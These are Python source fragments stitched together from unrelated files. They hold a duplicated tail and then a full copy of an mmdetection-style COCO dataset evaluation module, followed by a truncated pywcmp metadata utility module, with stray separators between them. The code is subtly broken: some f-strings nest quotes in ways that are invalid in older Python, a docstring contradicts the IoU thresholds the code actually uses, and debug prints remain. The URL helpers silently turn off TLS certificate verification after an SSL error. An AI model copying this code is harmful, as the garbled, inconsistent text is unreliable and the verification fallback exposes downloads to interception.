gt_bboxes.append(bboxes)
recalls = eval_recalls(
gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
ar = recalls.mean(axis=1)
return ar
def format_results(self, results, jsonfile_prefix=None, **kwargs):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[tuple | numpy.ndarray]): Testing results of the
dataset.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
Returns:
tuple: (result_files, tmp_dir), result_files is a dict containing \
the json filepaths, tmp_dir is the temporal directory created \
for saving json files when jsonfile_prefix is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
result_files = self.results2json(results, jsonfile_prefix)
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
classwise=False,
proposal_nums=(100, 300, 1000),
iou_thrs=None,
metric_items=None):
"""Evaluation in COCO protocol.
Args:
results (list[list | tuple]): Testing results of the dataset.
metric (str | list[str]): Metrics to be evaluated. Options are
'bbox', 'segm', 'proposal', 'proposal_fast'.
logger (logging.Logger | str | None): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
classwise (bool): Whether to evaluating the AP for each class.
proposal_nums (Sequence[int]): Proposal number used for evaluating
recalls, such as recall@100, recall@1000.
Default: (100, 300, 1000).
iou_thrs (Sequence[float], optional): IoU threshold used for
evaluating recalls/mAPs. If set to a list, the average of all
IoUs will also be computed. If not specified, [0.50, 0.55,
0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
Default: None.
metric_items (list[str] | str, optional): Metric items that will
be returned. If not specified, ``['AR@100', 'AR@300',
'AR@1000', 'AR_s@1000', 'AR_m@1000', 'AR_l@1000' ]`` will be
used when ``metric=='proposal'``, ``['mAP', 'mAP_50', 'mAP_75',
'mAP_s', 'mAP_m', 'mAP_l']`` will be used when
``metric=='bbox' or metric=='segm'``.
Returns:
dict[str, float]: COCO style evaluation metric.
"""
metrics = metric if isinstance(metric, list) else [metric]
allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
for metric in metrics:
if metric not in allowed_metrics:
raise KeyError(f'metric {metric} is not supported')
if iou_thrs is None:
iou_thrs = np.linspace(
.10, 0.95, int(np.round((0.95 - .10) / .05)) + 1, endpoint=True)
print(iou_thrs)
if metric_items is not None:
if not isinstance(metric_items, list):
metric_items = [metric_items]
result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
eval_results = {}
cocoGt = self.coco
for metric in metrics:
msg = f'Evaluating {metric}...'
if logger is None:
msg = '\n' + msg
print_log(msg, logger=logger)
if metric == 'proposal_fast':
ar = self.fast_eval_recall(
results, proposal_nums, iou_thrs, logger='silent')
log_msg = []
for i, num in enumerate(proposal_nums):
eval_results[f'AR@{num}'] = ar[i]
log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
log_msg = ''.join(log_msg)
print_log(log_msg, logger=logger)
continue
if metric not in result_files:
raise KeyError(f'{metric} is not in results')
try:
cocoDt = cocoGt.loadRes(result_files[metric])
except IndexError:
print_log(
'The testing results of the whole dataset is empty.',
logger=logger,
level=logging.ERROR)
break
iou_type = 'bbox' if metric == 'proposal' else metric
cocoEval = COCOeval(cocoGt, cocoDt, iou_type)
cocoEval.params.catIds = self.cat_ids
cocoEval.params.imgIds = self.img_ids
cocoEval.params.maxDets = list(proposal_nums)
cocoEval.params.iouThrs = iou_thrs
# mapping of cocoEval.stats
coco_metric_names = {
'mAP': 0,
'mAP_50': 1,
'mAP_75': 2,
'mAP_25': 3,
'map_10':4,
'mAP_s': 5,
'mAP_m': 6,
'mAP_l': 7,
'AR@100': 8,
'AR@300': 9,
'AR@1000': 10,
'AR_s@1000': 11,
'AR_m@1000': 12,
'AR_l@1000': 13
}
if metric_items is not None:
for metric_item in metric_items:
if metric_item not in coco_metric_names:
raise KeyError(
f'metric item {metric_item} is not supported')
if metric == 'proposal':
cocoEval.params.useCats = 0
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
if metric_items is None:
metric_items = [
'AR@100', 'AR@300', 'AR@1000', 'AR_s@1000',
'AR_m@1000', 'AR_l@1000'
]
for item in metric_items:
val = float(
f'{cocoEval.stats[coco_metric_names[item]]:.3f}')
eval_results[item] = val
else:
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
if classwise: # Compute per-category AP
# Compute per-category AP
# from https://github.com/facebookresearch/detectron2/
precisions = cocoEval.eval['precision']
# precision: (iou, recall, cls, area range, max dets)
assert len(self.cat_ids) == precisions.shape[2]
results_per_category = []
for idx, catId in enumerate(self.cat_ids):
# area range index 0: all area ranges
# max dets index -1: typically 100 per image
nm = self.coco.loadCats(catId)[0]
precision = precisions[:, :, idx, 0, -1]
precision = precision[precision > -1]
if precision.size:
ap = np.mean(precision)
else:
ap = float('nan')
results_per_category.append(
(f'{nm['name']}', f'{float(ap):0.3f}'))
num_columns = min(6, len(results_per_category) * 2)
results_flatten = list(
itertools.chain(*results_per_category))
headers = ['category', 'AP'] * (num_columns // 2)
results_2d = itertools.zip_longest(*[
results_flatten[i::num_columns]
for i in range(num_columns)
])
table_data = [headers]
table_data += [result for result in results_2d]
table = AsciiTable(table_data)
print_log('\n' + table.table, logger=logger)
if metric_items is None:
metric_items = [
'mAP', 'mAP_50', 'mAP_75', 'mAP_25','map_10','mAP_s', 'mAP_m', 'mAP_l'
]
for metric_item in metric_items:
key = f'{metric}_{metric_item}'
val = float(
f'{cocoEval.stats[coco_metric_names[metric_item]]:.3f}'
)
eval_results[key] = val
ap = cocoEval.stats[:6]
eval_results[f'{metric}_mAP_copypaste'] = (
f'{ap[0]:.3f} {ap[1]:.3f} {ap[2]:.3f} {ap[3]:.3f} '
f'{ap[4]:.3f} {ap[5]:.3f}')
if tmp_dir is not None:
tmp_dir.cleanup()
return eval_results
| import itertools
import logging
import os.path as osp
import tempfile
import mmcv
import numpy as np
from mmcv.utils import print_log
from pycocotools.coco import COCO
#from pycocotools.cocoeval import COCOeval
from mmdet.datasets.fast_eval_api import COCOeval_opt as COCOeval
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .builder import DATASETS
from .custom import CustomDataset
try:
import pycocotools
assert pycocotools.__version__ >= '12.0.2'
except AssertionError:
raise AssertionError('Incompatible version of pycocotools is installed. '
'Run pip uninstall pycocotools first. Then run pip '
'install mmpycocotools to install open-mmlab forked '
'pycocotools.')
@DATASETS.register_module()
class CocoDataset(CustomDataset):
CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')
def load_annotations(self, ann_file):
"""Load annotation from COCO style annotation file.
Args:
ann_file (str): Path of annotation file.
Returns:
list[dict]: Annotation info from COCO api.
"""
self.coco = COCO(ann_file)
self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
self.img_ids = self.coco.get_img_ids()
data_infos = []
for i in self.img_ids:
info = self.coco.load_imgs([i])[0]
info['filename'] = info['file_name']
data_infos.append(info)
return data_infos
def get_ann_info(self, idx):
"""Get COCO annotation by index.
Args:
idx (int): Index of data.
Returns:
dict: Annotation info of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return self._parse_ann_info(self.data_infos[idx], ann_info)
def get_cat_ids(self, idx):
"""Get COCO category ids by index.
Args:
idx (int): Index of data.
Returns:
list[int]: All categories in the image of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return [ann['category_id'] for ann in ann_info]
def _filter_imgs(self, min_size=32):
"""Filter images too small or without ground truths."""
valid_inds = []
# obtain images that contain annotation
ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
# obtain images that contain annotations of the required categories
ids_in_cat = set()
for i, class_id in enumerate(self.cat_ids):
ids_in_cat |= set(self.coco.cat_img_map[class_id])
# merge the image id sets of the two conditions and use the merged set
# to filter out images if self.filter_empty_gt=True
ids_in_cat &= ids_with_ann
valid_img_ids = []
for i, img_info in enumerate(self.data_infos):
img_id = self.img_ids[i]
if self.filter_empty_gt and img_id not in ids_in_cat:
continue
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(i)
valid_img_ids.append(img_id)
self.img_ids = valid_img_ids
return valid_inds
def _parse_ann_info(self, img_info, ann_info):
"""Parse bbox and mask annotation.
Args:
ann_info (list[dict]): Annotation info of an image.
with_mask (bool): Whether to parse mask annotations.
Returns:
dict: A dict containing the following keys: bboxes, bboxes_ignore,\
labels, masks, seg_map. "masks" are raw annotations and not \
decoded into binary masks.
"""
gt_bboxes = []
gt_labels = []
gt_bboxes_ignore = []
gt_masks_ann = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
if inter_w * inter_h == 0:
continue
if ann['area'] <= 0 or w < 1 or h < 1:
continue
if ann['category_id'] not in self.cat_ids:
continue
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
gt_bboxes_ignore.append(bbox)
else:
gt_bboxes.append(bbox)
gt_labels.append(self.cat2label[ann['category_id']])
gt_masks_ann.append(ann.get('segmentation', None))
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
if gt_bboxes_ignore:
gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
else:
gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
seg_map = img_info['filename'].replace('jpg', 'png')
#print('---'*100)
#print(img_info)
ann = dict(
bboxes=gt_bboxes,
labels=gt_labels,
bboxes_ignore=gt_bboxes_ignore,
masks=gt_masks_ann,
seg_map=seg_map)
return ann
def xyxy2xywh(self, bbox):
"""Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
evaluation.
Args:
bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
``xyxy`` order.
Returns:
list[float]: The converted bounding boxes, in ``xywh`` order.
"""
_bbox = bbox.tolist()
return [
_bbox[0],
_bbox[1],
_bbox[2] - _bbox[0],
_bbox[3] - _bbox[1],
]
def _proposal2json(self, results):
"""Convert proposal results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
bboxes = results[idx]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = 1
json_results.append(data)
return json_results
def _det2json(self, results):
"""Convert detection results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
result = results[idx]
for label in range(len(result)):
bboxes = result[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
json_results.append(data)
return json_results
def _segm2json(self, results):
"""Convert instance segmentation results to COCO json style."""
bbox_json_results = []
segm_json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
det, seg = results[idx]
for label in range(len(det)):
# bbox results
bboxes = det[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
bbox_json_results.append(data)
# segm results
# some detectors use different scores for bbox and mask
if isinstance(seg, tuple):
segms = seg[0][label]
mask_score = seg[1][label]
else:
segms = seg[label]
mask_score = [bbox[4] for bbox in bboxes]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(mask_score[i])
data['category_id'] = self.cat_ids[label]
if isinstance(segms[i]['counts'], bytes):
segms[i]['counts'] = segms[i]['counts'].decode()
data['segmentation'] = segms[i]
segm_json_results.append(data)
return bbox_json_results, segm_json_results
def results2json(self, results, outfile_prefix):
"""Dump the detection results to a COCO style json file.
There are 3 types of results: proposals, bbox predictions, mask
predictions, and they have different data types. This method will
automatically recognize the type, and dump them to json files.
Args:
results (list[list | tuple | ndarray]): Testing results of the
dataset.
outfile_prefix (str): The filename prefix of the json files. If the
prefix is "somepath/xxx", the json files will be named
"somepath/xxx.bbox.json", "somepath/xxx.segm.json",
"somepath/xxx.proposal.json".
Returns:
dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
values are corresponding filenames.
"""
result_files = dict()
if isinstance(results[0], list):
json_results = self._det2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
mmcv.dump(json_results, result_files['bbox'])
elif isinstance(results[0], tuple):
json_results = self._segm2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
result_files['segm'] = f'{outfile_prefix}.segm.json'
mmcv.dump(json_results[0], result_files['bbox'])
mmcv.dump(json_results[1], result_files['segm'])
elif isinstance(results[0], np.ndarray):
json_results = self._proposal2json(results)
result_files['proposal'] = f'{outfile_prefix}.proposal.json'
mmcv.dump(json_results, result_files['proposal'])
else:
raise TypeError('invalid type of results')
return result_files
def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
gt_bboxes = []
for i in range(len(self.img_ids)):
ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
ann_info = self.coco.load_anns(ann_ids)
if len(ann_info) == 0:
gt_bboxes.append(np.zeros((0, 4)))
continue
bboxes = []
for ann in ann_info:
if ann.get('ignore', False) or ann['iscrowd']:
continue
x1, y1, w, h = ann['bbox']
bboxes.append([x1, y1, x1 + w, y1 + h])
bboxes = np.array(bboxes, dtype=np.float32)
if bboxes.shape[0] == 0:
bboxes = np.zeros((0, 4))
gt_bboxes.append(bboxes)
recalls = eval_recalls(
gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
ar = recalls.mean(axis=1)
return ar
def format_results(self, results, jsonfile_prefix=None, **kwargs):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[tuple | numpy.ndarray]): Testing results of the
dataset.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
Returns:
tuple: (result_files, tmp_dir), result_files is a dict containing \
the json filepaths, tmp_dir is the temporal directory created \
for saving json files when jsonfile_prefix is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
result_files = self.results2json(results, jsonfile_prefix)
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
classwise=False,
proposal_nums=(100, 300, 1000),
iou_thrs=None,
metric_items=None):
"""Evaluation in COCO protocol.
Args:
results (list[list | tuple]): Testing results of the dataset.
metric (str | list[str]): Metrics to be evaluated. Options are
'bbox', 'segm', 'proposal', 'proposal_fast'.
logger (logging.Logger | str | None): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
classwise (bool): Whether to evaluating the AP for each class.
proposal_nums (Sequence[int]): Proposal number used for evaluating
recalls, such as recall@100, recall@1000.
Default: (100, 300, 1000).
iou_thrs (Sequence[float], optional): IoU threshold used for
evaluating recalls/mAPs. If set to a list, the average of all
IoUs will also be computed. If not specified, [0.50, 0.55,
0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
Default: None.
metric_items (list[str] | str, optional): Metric items that will
be returned. If not specified, ``['AR@100', 'AR@300',
'AR@1000', 'AR_s@1000', 'AR_m@1000', 'AR_l@1000' ]`` will be
used when ``metric=='proposal'``, ``['mAP', 'mAP_50', 'mAP_75',
'mAP_s', 'mAP_m', 'mAP_l']`` will be used when
``metric=='bbox' or metric=='segm'``.
Returns:
dict[str, float]: COCO style evaluation metric.
"""
metrics = metric if isinstance(metric, list) else [metric]
allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
for metric in metrics:
if metric not in allowed_metrics:
raise KeyError(f'metric {metric} is not supported')
if iou_thrs is None:
iou_thrs = np.linspace(
.10, 0.95, int(np.round((0.95 - .10) / .05)) + 1, endpoint=True)
print(iou_thrs)
if metric_items is not None:
if not isinstance(metric_items, list):
metric_items = [metric_items]
result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
eval_results = {}
cocoGt = self.coco
for metric in metrics:
msg = f'Evaluating {metric}...'
if logger is None:
msg = '\n' + msg
print_log(msg, logger=logger)
if metric == 'proposal_fast':
ar = self.fast_eval_recall(
results, proposal_nums, iou_thrs, logger='silent')
log_msg = []
for i, num in enumerate(proposal_nums):
eval_results[f'AR@{num}'] = ar[i]
log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
log_msg = ''.join(log_msg)
print_log(log_msg, logger=logger)
continue
if metric not in result_files:
raise KeyError(f'{metric} is not in results')
try:
cocoDt = cocoGt.loadRes(result_files[metric])
except IndexError:
print_log(
'The testing results of the whole dataset is empty.',
logger=logger,
level=logging.ERROR)
break
iou_type = 'bbox' if metric == 'proposal' else metric
cocoEval = COCOeval(cocoGt, cocoDt, iou_type)
cocoEval.params.catIds = self.cat_ids
cocoEval.params.imgIds = self.img_ids
cocoEval.params.maxDets = list(proposal_nums)
cocoEval.params.iouThrs = iou_thrs
# mapping of cocoEval.stats
coco_metric_names = {
'mAP': 0,
'mAP_50': 1,
'mAP_75': 2,
'mAP_25': 3,
'map_10':4,
'mAP_s': 5,
'mAP_m': 6,
'mAP_l': 7,
'AR@100': 8,
'AR@300': 9,
'AR@1000': 10,
'AR_s@1000': 11,
'AR_m@1000': 12,
'AR_l@1000': 13
}
if metric_items is not None:
for metric_item in metric_items:
if metric_item not in coco_metric_names:
raise KeyError(
f'metric item {metric_item} is not supported')
if metric == 'proposal':
cocoEval.params.useCats = 0
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
if metric_items is None:
metric_items = [
'AR@100', 'AR@300', 'AR@1000', 'AR_s@1000',
'AR_m@1000', 'AR_l@1000'
]
for item in metric_items:
val = float(
f'{cocoEval.stats[coco_metric_names[item]]:.3f}')
eval_results[item] = val
else:
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
if classwise: # Compute per-category AP
# Compute per-category AP
# from https://github.com/facebookresearch/detectron2/
precisions = cocoEval.eval['precision']
# precision: (iou, recall, cls, area range, max dets)
assert len(self.cat_ids) == precisions.shape[2]
results_per_category = []
for idx, catId in enumerate(self.cat_ids):
# area range index 0: all area ranges
# max dets index -1: typically 100 per image
nm = self.coco.loadCats(catId)[0]
precision = precisions[:, :, idx, 0, -1]
precision = precision[precision > -1]
if precision.size:
ap = np.mean(precision)
else:
ap = float('nan')
results_per_category.append(
(f'{nm["name"]}', f'{float(ap):0.3f}'))
num_columns = min(6, len(results_per_category) * 2)
results_flatten = list(
itertools.chain(*results_per_category))
headers = ['category', 'AP'] * (num_columns // 2)
results_2d = itertools.zip_longest(*[
results_flatten[i::num_columns]
for i in range(num_columns)
])
table_data = [headers]
table_data += [result for result in results_2d]
table = AsciiTable(table_data)
print_log('\n' + table.table, logger=logger)
if metric_items is None:
metric_items = [
'mAP', 'mAP_50', 'mAP_75', 'mAP_25','map_10','mAP_s', 'mAP_m', 'mAP_l'
]
for metric_item in metric_items:
key = f'{metric}_{metric_item}'
val = float(
f'{cocoEval.stats[coco_metric_names[metric_item]]:.3f}'
)
eval_results[key] = val
ap = cocoEval.stats[:6]
eval_results[f'{metric}_mAP_copypaste'] = (
f'{ap[0]:.3f} {ap[1]:.3f} {ap[2]:.3f} {ap[3]:.3f} '
f'{ap[4]:.3f} {ap[5]:.3f}')
if tmp_dir is not None:
tmp_dir.cleanup()
return eval_results
|
# =================================================================
#
# Terms and Conditions of Use
#
# Unless otherwise noted, computer program source code of this
# distribution is covered under Crown Copyright, Government of
# Canada, and is distributed under the MIT License.
#
# The Canada wordmark and related graphics associated with this
# distribution are protected under trademark law and copyright law.
# No permission is granted to use them outside the parameters of
# the Government of Canada's corporate identity program. For
# more information, see
# http://www.tbs-sct.gc.ca/fip-pcim/index-eng.asp
#
# Copyright title to all 3rd party software distributed with this
# software is held by the respective copyright holders as noted in
# those files. Users are asked to read the 3rd Party Licenses
# referenced with those assets.
#
# Copyright (c) 2020-2021 Government of Canada
# Copyright (c) 2020-2021 IBL Software Engineering spol. s r. o.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import os
import ssl
import sys
from datetime import datetime, timezone, timedelta
from dateutil.parser import parse
from urllib.error import URLError
from urllib.request import urlopen
from urllib.parse import urlparse
from lxml import etree
LOGGER = logging.getLogger(__name__)
NAMESPACES = {
'gco': 'http://www.isotc211.org/2005/gco',
'gmd': 'http://www.isotc211.org/2005/gmd',
'gml': 'http://www.opengis.net/gml/3.2',
'gmx': 'http://www.isotc211.org/2005/gmx',
'xlink': 'http://www.w3.org/1999/xlink'
}
def get_cli_common_options(function):
"""
Define common CLI options
"""
import click
function = click.option('--verbosity', '-v',
type=click.Choice(
['ERROR', 'WARNING', 'INFO', 'DEBUG']),
help='Verbosity')(function)
function = click.option('--log', '-l', 'logfile',
type=click.Path(writable=True, dir_okay=False),
help='Log file')(function)
return function
def get_codelists():
"""
Helper function to assemble dict of ISO and WMO codelists
:param authority: code list authority (iso or wmo)
:returns: `dict` of ISO and WMO codelists
"""
codelists = {}
userdir = get_userdir()
codelist_files = {
'iso': f'{userdir}/schema/resources/Codelist/gmxCodelists.xml',
'wmo': f'{userdir}{os.sep}WMOCodeLists.xml'
}
for key, value in codelist_files.items():
codelists[key] = {}
xml = etree.parse(value)
for cld in xml.xpath('gmx:codelistItem/gmx:CodeListDictionary', namespaces=NAMESPACES):
identifier = cld.get(nspath_eval('gml:id'))
codelists[key][identifier] = []
for centry in cld.findall(nspath_eval('gmx:codeEntry/gmx:CodeDefinition/gml:identifier')):
codelists[key][identifier].append(centry.text)
return codelists
def get_string_or_anchor_value(parent) -> list:
"""
Returns list of strings (texts) from CharacterString or Anchor child elements of the given element
:param parent : The element to check
"""
values = []
value_elements = parent.findall(nspath_eval('gco:CharacterString')) + parent.findall(nspath_eval('gmx:Anchor'))
for element in value_elements:
values.append(element.text)
return values
def get_string_or_anchor_values(parent_elements: list) -> list:
"""
Returns list of strings (texts) from CharacterString or Anchor child elements of given parent_elements
:param parent_elements : List of parent elements of the CharacterString or Anchor to read.
"""
values = []
for parent in parent_elements:
values += get_string_or_anchor_value(parent)
return values
def get_keyword_info(main_keyword_element) -> tuple:
"""
Returns tuple with keywords, type value(s) and thesaurus(es) for given "MD_Keywords" element
:param main_keyword_element : The element to check
"""
keywords = main_keyword_element.findall(nspath_eval('gmd:keyword'))
type_element = get_codelist_values(main_keyword_element.findall(nspath_eval('gmd:type/gmd:MD_KeywordTypeCode')))
thesauruses = main_keyword_element.findall(nspath_eval('gmd:thesaurusName/gmd:CI_Citation/gmd:title'))
return keywords, type_element, thesauruses
def get_codelist_values(elements: list) -> list:
"""
Returns list of code list values as strings for all elements (except the ones with no value)
The value can be in the element attribute or text node.
:param elements : The elements to check
"""
values = []
for element in elements:
value = element.get('codeListValue')
if value is None:
value = element.text
if value is not None:
values.append(value)
return values
def parse_time_position(element) -> datetime:
"""
Returns datetime extracted from the given GML element or None if parsing failed.
The parsing is rather benevolent here to allow mixing of "Zulu" and "naive" time strings (and other oddities),
in the hope that all meteorological data refer to UTC.
:param element : XML / GML element (e.g. gml:beginPosition)
"""
indeterminate_pos = element.get('indeterminatePosition')
if indeterminate_pos is not None:
if indeterminate_pos in ["now", "unknown"]:
return datetime.now(timezone.utc)
elif indeterminate_pos == "before":
return datetime.now(timezone.utc) - timedelta(hours=24)
elif indeterminate_pos == "after":
return datetime.now(timezone.utc) + timedelta(hours=24)
else:
LOGGER.debug(f'Time point has unexpected value of indeterminatePosition: {indeterminate_pos}')
elif element.text is not None:
text_to_parse = element.text
if text_to_parse.endswith('Z'):
text_to_parse = text_to_parse[0:-1]
try:
dtg = parse(text_to_parse, fuzzy=True, ignoretz=True).replace(tzinfo=timezone.utc)
return dtg
except Exception as err:
msg = f'Invalid time string: {err}'
LOGGER.debug(msg)
return None
def get_userdir() -> str:
"""
Helper function to get userdir
:returns: user's home directory
"""
return f'{os.path.expanduser('~')}{os.sep}.pywcmp'
def nspath_eval(xpath: str) -> str:
"""
Return an etree friendly xpath based expanding namespace
into namespace URIs
:param xpath: xpath string with namespace prefixes
:returns: etree friendly xpath
"""
out = []
for chunk in xpath.split('/'):
if ':' in chunk:
namespace, element = chunk.split(':')
out.append(f'{{{NAMESPACES[namespace]}}}{element}')
else:
out.append(chunk)
return '/'.join(out)
def setup_logger(loglevel: str = None, logfile: str = None):
"""
Setup logging
:param loglevel: logging level
:param logfile: logfile location
:returns: void (creates logging instance)
"""
if loglevel is None and logfile is None: # no logging
return
if loglevel is None and logfile is not None:
loglevel = 'INFO'
log_format = \
'[%(asctime)s] %(levelname)s - %(message)s'
date_format = '%Y-%m-%dT%H:%M:%SZ'
loglevels = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG,
'NOTSET': logging.NOTSET,
}
loglevel = loglevels[loglevel]
if logfile is not None: # log to file
logging.basicConfig(level=loglevel, datefmt=date_format,
format=log_format, filename=logfile)
elif loglevel is not None: # log to stdout
logging.basicConfig(level=loglevel, datefmt=date_format,
format=log_format, stream=sys.stdout)
LOGGER.debug('Logging initialized')
def urlopen_(url: str):
"""
Helper function for downloading a URL
:param url: URL to download
:returns: `http.client.HTTPResponse`
"""
try:
response = urlopen(url)
except (ssl.SSLError, URLError) as err:
LOGGER.warning(err)
LOGGER.warning('Creating unverified context')
context = ssl._create_unverified_context()
response = urlopen(url, context=context)
return response
def check_url(url: str, check_ssl: bool, timeout: int = 30) -> dict:
"""
Helper function to check link (URL) accessibility
:param url: The URL to check
:param check_ssl: Whether the SSL/TLS layer verification shall be made
:param timeout: timeout, in seconds (default: 30)
:returns: `dict` with details about the link
"""
response = None
result = {
'mime-type': None,
'url-original': url
}
try:
if check_ssl is False:
LOGGER.debug('Creating unverified context')
result['ssl'] = False
context = ssl._create_unverified_context()
response = urlopen(url, context=context, timeout=timeout)
else:
response = urlopen(url, timeout=timeout)
except TimeoutError as err:
LOGGER.debug(f'Timeout error: {err}')
except (ssl.SSLError, URLError, ValueError) as err:
LOGGER.debug(f'SSL/URL error: {err}')
LOGGER.debug(err)
except Exception as err:
LOGGER.debug(f'Other error: {err}')
LOGGER.debug(err)
if response is None and check_ssl is True:
return check_url(url, False)
if response is not None:
result['url-resolved'] = response.url
parsed_uri = urlparse(response.url)
if parsed_uri.scheme in ('http', 'https'):
if response.status > 300:
LOGGER.debug(f'Request failed: {response}')
